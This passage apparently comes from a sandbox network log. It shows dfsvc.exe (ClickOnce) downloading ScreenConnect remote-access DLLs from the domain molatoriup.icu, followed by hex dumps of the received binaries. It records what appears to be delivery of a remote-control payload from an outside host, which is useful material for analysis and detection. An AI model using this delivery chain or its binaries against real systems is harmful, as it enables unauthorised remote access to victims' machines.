2024-10-04 23:03:17 UTC	16384	IN	Data Raw: 47 1f 16 00 f6 03 58 1f 16 00 30 07 69 1f 16 00 ab 08 47 1f 16 00 30 04 71 1f 16 00 4d 07 7b 1f 16 00 01 00 85 1f 16 00 3b 03 85 1f 06 00 ce 72 8e 1f 06 00 69 5c 9d 1d 06 00 ce 72 8e 1f 06 00 a5 75 8e 1d 01 00 e3 74 93 1f 01 00 e5 59 a9 10 01 00 50 37 99 1f 36 00 56 0a 9e 1f 16 00 8a 02 a3 1f 36 00 56 0a af 1f 16 00 a0 00 a3 1f 36 00 56 0a e6 11 16 00 70 00 dc 11 16 00 94 03 52 12 06 00 12 81 64 07 06 00 06 63 b4 11 06 00 7b 6d 0f 11 06 00 ce 72 b9 11 06 00 71 32 c6 11 06 00 9c 79 cb 11 06 00 90 83 a6 10 06 00 a9 62 2c 13 06 00 ce 72 b9 11 06 00 19 0d 58 04 06 00 26 77 b4 1f 06 00 ce 72 b9 1f 06 00 ac 65 7a 1e 06 00 7d 5d cb 11 36 00 56 0a be 1f 16 00 6c 01 c3 1f 06 00 ce 72 d5 1f 06 00 12 81 2a 1f 06 00 1a 63 da 1f 06 00 e4 7d 74 1d 06 00 79 59 ec 1f 06 Data Ascii: GX0iG0qM{;ri\rutYP76V6V6VpRdc{mrq2yb,rX&wrez}]6Vlr*c}tyY
2024-10-04 23:03:17 UTC	16384	IN	Data Raw: 00 00 00 00 c4 01 1e 2a ce 2b e8 03 8c b2 00 00 00 00 94 00 7b 3e d8 2b e9 03 00 00 00 00 00 00 c4 05 42 64 e2 2b ea 03 2f b3 00 00 00 00 81 00 bc 71 e2 2b eb 03 50 b3 00 00 00 00 c4 00 58 10 d1 21 ec 03 a0 b9 00 00 00 00 81 00 81 2a e9 2b ed 03 08 ba 00 00 00 00 91 00 00 0f f8 2b f0 03 a0 ba 00 00 00 00 81 00 6a 09 08 2c f4 03 c0 ba 00 00 00 00 91 18 97 66 aa 20 f5 03 cc ba 00 00 00 00 86 18 91 66 01 00 f5 03 d4 ba 00 00 00 00 83 00 87 01 0f 2c f5 03 f3 ba 00 00 00 00 91 18 97 66 aa 20 f6 03 ff ba 00 00 00 00 86 18 91 66 01 00 f6 03 07 bb 00 00 00 00 83 00 3a 00 20 2c f6 03 0f bb 00 00 00 00 83 00 74 03 27 2c f7 03 17 bb 00 00 00 00 83 00 a3 01 78 29 f8 03 2a bb 00 00 00 00 86 18 91 66 01 00 f9 03 32 bb 00 00 00 00 83 00 b9 02 76 07 f9 03 56 bb 00 00 00 Data Ascii: +{>+Bd+/q+PX!++j,f f,f f: ,t',x)*f2vV
2024-10-04 23:03:17 UTC	16384	IN	Data Raw: 41 13 6b 00 a0 1c 60 13 6b 00 a0 1c 61 13 1a 00 db 2e 61 13 6b 00 a0 1c 80 13 6b 00 a0 1c a3 13 6b 00 a0 1c c3 13 6b 00 a0 1c e1 13 6b 00 a0 1c e3 13 6b 00 a0 1c 01 14 6b 00 a0 1c 03 14 6b 00 a0 1c 21 14 6b 00 a0 1c 41 14 6b 00 a0 1c 60 14 6b 00 a0 1c 61 14 6b 00 a0 1c 63 14 6b 00 a0 1c 81 14 6b 00 a0 1c 83 14 6b 00 a0 1c a0 14 6b 00 a0 1c a1 14 6b 00 a0 1c c1 14 6b 00 a0 1c c3 14 6b 00 a0 1c e1 14 6b 00 a0 1c e3 14 6b 00 a0 1c 01 15 6b 00 a0 1c 03 15 6b 00 a0 1c 21 15 6b 00 a0 1c 23 15 6b 00 a0 1c 41 15 1a 00 5c 2f 41 15 6b 00 a0 1c 44 15 c2 05 a0 1c 61 15 6b 00 a0 1c 63 15 6b 00 a0 1c 80 15 6b 00 a0 1c 81 15 6b 00 a0 1c 83 15 6b 00 a0 1c a0 15 6b 00 a0 1c a1 15 1a 00 db 2e a1 15 6b 00 a0 1c a3 15 6b 00 a0 1c c0 15 6b 00 a0 1c c1 15 6b 00 a0 1c c3 15 6b Data Ascii: Ak`ka.akkkkkkkk!kAk`kakckkkkkkkkkkk!k#kA\/AkDakckkkkk.kkkkk
2024-10-04 23:03:17 UTC	16384	IN	Data Raw: 65 71 75 65 73 74 49 44 00 3c 3e 4f 00 53 79 73 74 65 6d 2e 49 4f 00 3c 73 74 72 65 61 6d 49 44 3e 50 00 43 61 6c 63 75 6c 61 74 65 46 50 53 00 54 00 67 65 74 5f 58 00 74 69 6c 65 58 00 67 65 74 5f 59 00 74 69 6c 65 59 00 76 61 6c 75 65 5f 5f 00 55 6e 69 6f 6e 55 6e 6c 65 73 73 4e 6f 41 72 65 61 00 67 65 74 5f 44 61 74 61 00 73 65 74 5f 44 61 74 61 00 73 6f 75 6e 64 44 61 74 61 00 57 72 69 74 65 4d 65 73 73 61 67 65 44 61 74 61 00 67 65 74 5f 46 72 61 6d 65 44 61 74 61 00 73 65 74 5f 46 72 61 6d 65 44 61 74 61 00 53 69 67 6e 44 61 74 61 00 67 65 74 5f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 44 61 74 61 00 73 65 74 5f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 44 61 74 61 00 49 42 69 74 6d 61 70 44 61 74 61 00 62 69 74 6d 61 70 44 61 74 61 00 64 61 74 61 Data Ascii: equestID<>OSystem.IO<streamID>PCalculateFPSTget_XtileXget_YtileYvalue__UnionUnlessNoAreaget_Dataset_DatasoundDataWriteMessageDataget_FrameDataset_FrameDataSignDataget_AuthenticationDataset_AuthenticationDataIBitmapDatabitmapDatadata
2024-10-04 23:03:17 UTC	16384	IN	Data Raw: 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 4f 70 65 6e 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6e 74 72 6f 6c 50 61 6e 65 6c 4d 65 73 73 61 67 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 43 6c 69 70 62 6f 61 72 64 4b 65 79 73 74 72 6f 6b 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 46 69 6c 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 52 65 63 65 69 76 65 Data Ascii: Monitor.pngScreenConnect.Properties.CommandOpenMonitor.pngScreenConnect.Properties.ControlPanelMessages.pngScreenConnect.Properties.CommandSendClipboardKeystrokes.pngScreenConnect.Properties.CommandSendFiles.pngScreenConnect.Properties.CommandReceive
2024-10-04 23:03:17 UTC	16384	IN	Data Raw: 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 3b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 20 00 3d 00 20 00 00 2b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 4d 00 75 00 74 00 65 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 31 53 00 65 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 56 00 6f 00 6c 00 75 00 6d 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 13 56 00 6f 00 6c 00 75 Data Ascii: ommand;SelectSoundCaptureModeCommand'SoundCaptureMode = +SelectSpeakersCommand'MuteSpeakersCommand1SetSpeakersVolumeCommandVolu
2024-10-04 23:03:17 UTC	16384	IN	Data Raw: 74 4d 69 6c 6c 69 73 65 63 6f 6e 64 43 6f 75 6e 74 13 57 61 73 4e 65 74 77 6f 72 6b 52 65 61 63 68 61 62 6c 65 13 57 61 73 48 61 6e 64 73 68 61 6b 65 53 74 61 72 74 65 64 15 57 61 73 48 61 6e 64 73 68 61 6b 65 43 6f 6d 70 6c 65 74 65 64 00 00 21 01 00 02 00 00 00 10 4d 65 74 72 69 63 73 45 6e 74 72 79 54 79 70 65 07 4d 69 6e 69 6d 75 6d 00 00 26 01 00 84 6b 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 4c 14 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 02 00 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 06 01 00 e4 00 00 00 06 01 00 48 00 00 00 06 01 00 49 00 00 00 06 01 Data Ascii: tMillisecondCountWasNetworkReachableWasHandshakeStartedWasHandshakeCompleted!MetricsEntryTypeMinimum&kTAllowMultipleTInherited&LTAllowMultipleTInherited&TAllowMultipleTInheritedHI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49752	31.42.187.211	443	7120	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-04 23:03:18 UTC	98	OUT	GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1 Host: molatoriup.icu Accept-Encoding: gzip
2024-10-04 23:03:18 UTC	215	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 68096 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-437666475 Microsoft-HTTPAPI/2.0 Date: Fri, 04 Oct 2024 23:02:42 GMT Connection: close
2024-10-04 23:03:18 UTC	16169	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 30 d8 54 90 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 02 01 00 00 06 00 00 00 00 00 00 ba 20 01 00 00 20 00 00 00 40 01 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 64 fa 01 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0T" 0 @ d@
2024-10-04 23:03:18 UTC	16384	IN	Data Raw: 00 0a 07 6f 11 00 00 0a 2d d0 de 0a 07 2c 06 07 6f 10 00 00 0a dc 06 7b 54 00 00 04 6f 24 02 00 0a 13 04 2b 5a 11 04 6f 25 02 00 0a 13 05 02 7b 53 00 00 04 7b 0d 00 00 04 11 05 73 26 02 00 0a 25 02 7b 52 00 00 04 28 f8 00 00 0a 7e 30 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 6d 00 00 06 73 06 02 00 0a 25 80 30 00 00 04 28 5f 00 00 2b 6f 27 02 00 0a 73 81 00 00 0a 6f 82 00 00 0a 11 04 6f 11 00 00 0a 2d 9d de 0c 11 04 2c 07 11 04 6f 10 00 00 0a dc 2a 01 1c 00 00 02 00 65 00 34 99 00 0a 00 00 00 00 02 00 b0 00 67 17 01 0c 00 00 00 00 1e 02 28 1d 00 00 0a 2a 56 02 7b 54 00 00 04 03 6f 23 02 00 0a 6f 28 02 00 0a 16 fe 01 2a 1e 02 28 1d 00 00 0a 2a 4a 02 7b 56 00 00 04 6f 29 02 00 0a 03 28 2a 02 00 0a 2a 1e 02 28 1d 00 00 0a 2a 00 00 00 13 30 03 00 43 00 00 00 Data Ascii: o-,o{To$+Zo%{S{s&%{R(~0%-&~+ms%0(_+o'soo-,oe4g(V{To#o((J{Vo)(*(0C
2024-10-04 23:03:18 UTC	16384	IN	Data Raw: 15 19 04 ae 2d 2d 15 19 04 cd 2e 37 15 b1 04 3c 27 3e 15 31 04 cb 31 78 09 29 04 e0 42 f6 00 e9 04 fe 42 56 15 f4 00 9b 18 81 02 31 04 a5 32 5c 15 f4 03 71 3a a1 00 fc 03 71 3a a1 00 19 04 ca 2d 85 15 11 03 71 3a 6a 04 09 03 5e 30 9e 15 d9 07 e5 35 a7 15 09 03 42 2c ad 15 e1 07 6b 29 06 00 19 03 5d 31 20 02 31 04 83 2d bd 15 29 04 84 31 6a 04 19 03 80 25 20 02 29 04 ad 25 6a 04 19 03 99 1b 20 02 29 04 c6 1b 6a 04 e1 07 61 29 06 00 21 03 f7 2e 20 02 d1 00 ea 49 c5 15 29 04 04 2f 6a 04 a9 04 31 3d b2 11 8c 03 8d 08 5a 04 e9 04 b2 49 bd 0a 04 04 f8 3e 46 00 8c 03 52 0b 5e 04 e9 04 cd 42 d8 15 31 04 e2 34 e0 15 29 04 e0 46 14 01 d1 01 9a 42 ef 15 5c 02 de 2c 63 00 09 02 e1 2e 14 01 69 02 c8 41 00 16 69 02 c3 17 14 01 29 05 7a 2d f6 00 59 03 d0 2d 06 16 a4 02 Data Ascii: --.7<'>11x)BBV12\q:q:-q:j^05B,k)]1 1-)1j% )%j )ja)!. I)/j1=ZI>FR^B14)FB\,c.iAi)z-Y-
2024-10-04 23:03:19 UTC	16384	IN	Data Raw: 74 79 41 63 74 69 6f 6e 00 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 00 53 65 74 74 69 6e 67 73 50 72 6f 70 65 72 74 79 56 61 6c 75 65 43 6f 6c 6c 65 63 74 69 6f 6e 00 47 72 6f 75 70 43 6f 6c 6c 65 63 74 69 6f 6e 00 57 61 69 74 69 6e 67 46 6f 72 43 6f 6e 6e 65 63 74 69 6f 6e 00 57 69 6e 33 32 45 78 63 65 70 74 69 6f 6e 00 43 72 79 70 74 6f 67 72 61 70 68 69 63 45 78 63 65 70 74 69 6f 6e 00 4e 6f 74 53 75 70 70 6f 72 74 65 64 45 78 63 65 70 74 69 6f 6e 00 54 72 61 63 65 45 78 63 65 70 74 69 6f 6e 00 45 6e 64 4f 66 53 74 72 65 61 6d 45 78 63 65 70 74 69 6f 6e 00 52 75 6e 57 69 74 68 43 72 61 73 68 4f 6e 45 78 63 65 70 74 69 6f 6e 00 54 72 79 53 75 62 73 63 72 69 62 65 54 6f 4c 6f 67 41 70 70 44 6f 6d 61 69 6e 45 78 63 65 70 74 69 6f 6e 00 49 6e 76 Data Ascii: tyActionSystem.ReflectionSettingsPropertyValueCollectionGroupCollectionWaitingForConnectionWin32ExceptionCryptographicExceptionNotSupportedExceptionTraceExceptionEndOfStreamExceptionRunWithCrashOnExceptionTrySubscribeToLogAppDomainExceptionInv
2024-10-04 23:03:19 UTC	2775	IN	Data Raw: 08 01 00 00 08 00 00 00 00 05 01 00 01 00 00 05 01 00 02 00 00 0a 01 00 02 00 00 00 00 01 00 00 20 01 00 03 00 00 00 09 53 65 73 73 69 6f 6e 49 44 04 4e 61 6d 65 08 55 73 65 72 4e 61 6d 65 00 00 0d 01 00 05 00 00 00 00 00 00 00 01 00 00 2d 01 00 02 00 00 00 1c 43 72 65 64 65 6e 74 69 61 6c 50 72 6f 76 69 64 65 72 49 6e 73 74 61 6e 63 65 49 44 07 4d 65 73 73 61 67 65 00 00 0b 01 00 03 00 00 00 00 01 01 00 00 33 01 00 03 00 00 00 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0b 43 6f 6d 6d 61 6e 64 4c 69 6e 65 0f 50 61 72 65 6e 74 50 72 6f 63 65 73 73 49 44 00 00 52 01 00 05 00 00 00 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0b 43 6f 6d 6d 61 6e 64 4c 69 6e 65 0f 50 61 72 65 6e 74 50 72 6f 63 65 73 73 49 44 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0f Data Ascii: SessionIDNameUserName-CredentialProviderInstanceIDMessage3ExecutablePathCommandLineParentProcessIDRExecutablePathCommandLineParentProcessIDExecutablePath

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49753	31.42.187.211	443	7120	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-04 23:03:19 UTC	92	OUT	GET /Bin/ScreenConnect.Windows.dll HTTP/1.1 Host: molatoriup.icu Accept-Encoding: gzip
2024-10-04 23:03:20 UTC	217	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 1721856 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-437666475 Microsoft-HTTPAPI/2.0 Date: Fri, 04 Oct 2024 23:02:43 GMT Connection: close
2024-10-04 23:03:20 UTC	16167	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c da d0 ab 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 3e 1a 00 00 06 00 00 00 00 00 00 82 5d 1a 00 00 20 00 00 00 60 1a 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 1a 00 00 02 00 00 5b ab 1a 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELl" 0>] ` [@
2024-10-04 23:03:20 UTC	16384	IN	Data Raw: 00 0a 14 04 05 16 28 ba 00 00 06 13 06 de 11 09 28 01 02 00 0a dc 06 2c 06 06 6f 11 00 00 0a dc 11 06 2a 00 00 01 34 00 00 02 00 99 00 0a a3 00 0c 00 00 00 00 02 00 81 00 2e af 00 0c 00 00 00 00 02 00 73 00 87 fa 00 07 00 00 00 00 02 00 06 00 fb 01 01 0a 00 00 00 00 13 30 02 00 1f 00 00 00 2a 00 00 11 1f 28 7e 5e 00 00 0a 28 e0 00 00 06 72 71 06 00 70 28 02 02 00 0a 0a 02 06 28 bd 00 00 06 2a 00 13 30 05 00 47 00 00 00 00 00 00 00 03 25 2d 06 26 28 be 00 00 06 18 8d d9 00 00 01 25 16 72 9d 06 00 70 a2 25 17 72 b9 06 00 70 a2 28 03 02 00 0a 7e a7 00 00 04 25 2d 13 26 14 fe 06 04 02 00 0a 73 05 02 00 0a 25 80 a7 00 00 04 02 28 32 00 00 2b 2a 00 1b 30 04 00 90 00 00 00 3a 00 00 11 28 0d 01 00 06 1f 0a 16 20 7c 4f 00 00 73 07 02 00 0a 28 6e 01 00 0a 2c 35 20 Data Ascii: ((,o4.s0(~^(rqp((0G%-&(%rp%rp(~%-&s%(2+0:( \|Os(n,5
2024-10-04 23:03:20 UTC	16384	IN	Data Raw: 00 00 04 7d f8 00 00 04 02 17 7d f7 00 00 04 17 2a 02 15 7d f7 00 00 04 02 02 7b fc 00 00 04 18 28 aa 01 00 06 7d fc 00 00 04 02 7b fc 00 00 04 16 d3 28 84 00 00 0a 2d c3 16 2a 1e 02 7b f8 00 00 04 2a 1a 73 7b 01 00 0a 7a 32 02 7b f8 00 00 04 8c ce 00 00 01 2a 00 00 13 30 02 00 3c 00 00 00 88 00 00 11 02 7b f7 00 00 04 1f fe 33 1d 02 7b f9 00 00 04 28 4e 03 00 0a 6f 4f 03 00 0a 33 0b 02 16 7d f7 00 00 04 02 0a 2b 07 16 73 4d 03 00 06 0a 06 02 7b fb 00 00 04 7d fa 00 00 04 06 2a 1e 02 28 53 03 00 06 2a 7a 02 28 2c 00 00 0a 02 03 7d fd 00 00 04 02 28 4e 03 00 0a 6f 4f 03 00 0a 7d ff 00 00 04 2a 06 2a 00 00 00 13 30 05 00 d5 00 00 00 89 00 00 11 02 7b fd 00 00 04 0a 06 2c 09 06 17 3b 8d 00 00 00 16 2a 02 15 7d fd 00 00 04 1f 09 0b 02 17 07 25 17 58 0b 1f 1f Data Ascii: }}}{(}{(-{s{z2{0<{3{(NoO3}+sM{}(Sz(,}(NoO}*0{,;}%X
2024-10-04 23:03:20 UTC	16384	IN	Data Raw: 22 06 00 71 cc 6e 22 06 00 48 cf 6e 22 06 00 5e 3e 6e 22 06 00 9f a3 6e 22 06 00 c4 b2 a0 02 06 00 36 b2 6e 22 06 00 49 a7 a0 02 06 00 41 a7 6e 22 06 00 81 cc 6e 22 06 00 af 54 6e 22 06 00 ba 90 6e 22 06 00 9f a3 6e 22 06 00 7c aa 6e 22 06 00 f7 cf 71 22 06 00 ce 45 71 22 06 00 66 46 6e 22 06 00 07 59 6e 22 06 00 b6 bf 6e 22 06 00 31 6a 6e 22 06 00 8f 9f 6e 22 06 00 e8 60 6e 22 06 00 48 cf 6e 22 06 00 f4 5f 6e 22 06 00 04 52 25 25 06 00 e3 be 6e 22 06 00 5b be 6e 22 06 10 55 51 f7 25 06 06 80 30 af 08 56 80 80 c8 fb 25 56 80 69 c8 fb 25 06 06 80 30 af 08 56 80 35 9d 00 26 06 06 80 30 af 08 56 80 62 27 05 26 56 80 90 29 05 26 56 80 e3 0d 05 26 56 80 86 29 05 26 06 06 80 30 6e 22 56 80 2c 39 0a 26 56 80 97 c8 0a 26 56 80 5f 39 0a 26 56 80 60 bd 0a 26 56 80 Data Ascii: "qn"Hn"^>n"n"6n"IAn"n"Tn"n"n"\|n"q"Eq"fFn"Yn"n"1jn"n"`n"Hn"_n"R%%n"[n"UQ%0V%Vi%0V5&0Vb'&V)&V&V)&0n"V,9&V&V_9&V`&V
2024-10-04 23:03:20 UTC	16384	IN	Data Raw: 00 5e 53 10 00 0f 07 5e a5 00 00 00 00 91 18 18 99 0e 27 10 07 6a a5 00 00 00 00 86 18 ed 98 01 00 10 07 72 a5 00 00 00 00 83 00 d7 02 29 3b 10 07 7a a5 00 00 00 00 83 00 81 0a 30 3b 12 07 82 a5 00 00 00 00 86 18 ed 98 01 00 13 07 8a a5 00 00 00 00 83 00 d6 07 1b 3b 13 07 9d a5 00 00 00 00 91 18 18 99 0e 27 14 07 a9 a5 00 00 00 00 86 18 ed 98 01 00 14 07 b1 a5 00 00 00 00 83 00 ab 02 39 3b 14 07 b9 a5 00 00 00 00 83 00 55 0a 39 3b 15 07 c1 a5 00 00 00 00 86 18 ed 98 05 00 16 07 e0 a5 00 00 00 00 e1 01 ac 58 01 00 17 07 18 a6 00 00 00 00 e1 01 37 c2 3d 00 17 07 e4 a7 00 00 00 00 81 00 d5 0d 01 00 17 07 00 a8 00 00 00 00 e1 09 d0 bb e0 18 17 07 08 a8 00 00 00 00 e1 01 13 b6 01 00 17 07 0f a8 00 00 00 00 e1 09 96 bc 4e 00 17 07 18 a8 00 00 00 00 e1 01 bd 97 Data Ascii: ^S^'jr);z0;;'9;U9;X7=N
2024-10-04 23:03:20 UTC	16384	IN	Data Raw: 34 45 10 a9 06 0b 5f 39 02 3c 04 8d 4a a0 02 91 04 5f 46 01 00 89 06 8d 58 39 02 d1 03 86 c7 01 00 69 04 a6 58 01 00 71 09 dc 37 b1 1a 71 09 1c 36 89 01 59 06 ab cc e9 1a e1 02 ed 98 f8 1a e1 02 ed 98 07 1b 41 06 ed 98 10 00 b9 08 ae 9e 16 1b 19 0a 85 3e 1d 1b 29 02 96 4c 7c 04 31 02 ed 98 01 00 99 04 68 53 f5 09 c1 09 21 5b 10 00 39 02 96 4c 7c 04 39 02 35 70 89 01 99 02 e2 6a 7c 04 99 02 28 59 3b 1b b1 07 1b 6b 3d 0b 4c 04 a8 98 5b 00 54 04 b5 bc 49 00 44 02 ab 0d d9 00 08 00 14 00 25 1c 08 00 18 00 2a 1c 08 00 1c 00 2f 1c 08 00 20 00 34 1c 08 00 b8 00 39 1c 0e 00 bc 00 3e 1c 0e 00 c0 00 51 1c 0e 00 c4 00 62 1c 08 00 c8 00 75 1c 08 00 cc 00 7a 1c 0e 00 d0 00 7f 1c 0e 00 d4 00 8e 1c 0e 00 d8 00 9d 1c 0e 00 e0 00 c6 1c 08 00 f0 00 64 1d 08 00 f4 00 69 1d Data Ascii: 4E_9<J_FX9iXq7q6YA>)L\|1hS![9L\|95pj\|(Y;k=L[TID%*/ 49>Qbuzdi
2024-10-04 23:03:20 UTC	16384	IN	Data Raw: 39 5f 5f 31 33 35 5f 31 00 3c 47 65 74 46 75 6c 6c 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 3e 62 5f 5f 31 33 35 5f 31 00 3c 3e 63 5f 5f 44 69 73 70 6c 61 79 43 6c 61 73 73 34 37 5f 31 00 3c 43 6f 6e 6e 65 63 74 53 65 72 76 65 72 43 6c 69 65 6e 74 4e 61 6d 65 64 50 69 70 65 73 3e 67 5f 5f 57 61 69 74 41 6e 64 43 6f 6e 6e 65 63 74 4e 61 6d 65 64 50 69 70 65 7c 39 37 5f 31 00 3c 50 6f 70 75 6c 61 74 65 43 6f 6e 74 65 78 74 4d 65 6e 75 53 74 72 69 70 49 74 65 6d 73 3e 62 5f 5f 37 5f 31 00 3c 3e 39 5f 5f 38 5f 31 00 3c 50 6f 70 75 6c 61 74 65 43 6f 6e 74 65 78 74 4d 65 6e 75 53 74 72 69 70 49 74 65 6d 73 3e 62 5f 5f 38 5f 31 00 3c 3e 39 5f 5f 32 39 5f 31 00 3c 54 72 79 47 65 74 41 63 74 69 76 65 43 6f 6e 73 6f 6c 65 53 65 73 73 69 6f 6e 49 44 3e 62 5f 5f 32 Data Ascii: 9__135_1<GetFullExecutablePath>b__135_1<>c__DisplayClass47_1<ConnectServerClientNamedPipes>g__WaitAndConnectNamedPipe\|97_1<PopulateContextMenuStripItems>b__7_1<>9__8_1<PopulateContextMenuStripItems>b__8_1<>9__29_1<TryGetActiveConsoleSessionID>b__2
2024-10-04 23:03:20 UTC	16384	IN	Data Raw: 61 73 65 4b 65 79 48 61 6e 64 6c 65 00 6c 69 62 72 61 72 79 48 61 6e 64 6c 65 00 72 65 73 75 6d 65 5f 68 61 6e 64 6c 65 00 54 6f 52 65 63 74 61 6e 67 6c 65 00 47 65 74 43 6c 69 65 6e 74 52 65 63 74 61 6e 67 6c 65 00 47 65 74 57 69 6e 64 6f 77 52 65 63 74 61 6e 67 6c 65 00 72 65 63 74 61 6e 67 6c 65 00 70 44 61 74 61 46 69 6c 65 00 75 6c 6c 54 6f 74 61 6c 50 61 67 65 46 69 6c 65 00 75 6c 6c 41 76 61 69 6c 50 61 67 65 46 69 6c 65 00 43 72 65 61 74 65 46 69 6c 65 00 68 54 65 6d 70 6c 61 74 65 46 69 6c 65 00 44 65 6c 65 74 65 46 69 6c 65 00 4d 6f 76 65 46 69 6c 65 00 70 43 6f 6e 66 69 67 46 69 6c 65 00 54 72 79 55 6e 62 6c 6f 63 6b 46 69 6c 65 00 4c 6f 61 64 52 65 73 6f 75 72 63 65 50 61 63 6b 46 72 6f 6d 46 69 6c 65 00 4d 61 70 46 69 6c 65 00 70 48 65 6c 70 Data Ascii: aseKeyHandlelibraryHandleresume_handleToRectangleGetClientRectangleGetWindowRectanglerectanglepDataFileullTotalPageFileullAvailPageFileCreateFilehTemplateFileDeleteFileMoveFilepConfigFileTryUnblockFileLoadResourcePackFromFileMapFilepHelp
2024-10-04 23:03:20 UTC	16384	IN	Data Raw: 00 3c 39 3e 5f 5f 43 6c 6f 73 65 44 65 73 6b 74 6f 70 00 43 72 65 61 74 65 44 65 73 6b 74 6f 70 00 53 77 69 74 63 68 44 65 73 6b 74 6f 70 00 4f 70 65 6e 44 65 73 6b 74 6f 70 00 6c 70 44 65 73 6b 74 6f 70 00 54 72 79 45 6e 73 75 72 65 54 68 72 65 61 64 4f 6e 49 6e 70 75 74 44 65 73 6b 74 6f 70 00 4f 70 65 6e 49 6e 70 75 74 44 65 73 6b 74 6f 70 00 6c 70 73 7a 44 65 73 6b 74 6f 70 00 64 65 73 6b 74 6f 70 00 65 5f 73 70 00 55 72 69 53 63 68 65 6d 65 48 74 74 70 00 4e 61 74 69 76 65 43 6c 65 61 6e 75 70 00 6c 70 4c 6f 61 64 4f 72 64 65 72 47 72 6f 75 70 00 47 65 74 4c 61 73 74 41 63 74 69 76 65 50 6f 70 75 70 00 41 70 70 44 6f 6d 61 69 6e 53 65 74 75 70 00 70 73 7a 56 